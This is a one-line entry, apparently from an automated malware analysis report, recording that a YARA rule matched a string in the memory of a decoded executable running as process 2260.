Source: Yara match File source: Process Memory Space: 171429109375b3b920cee552fad739e9c4a7f13922ed9d66bf32a3993fab5b757bcc601074656.dat-decoded.exe PID: 2260, type: MEMORYSTR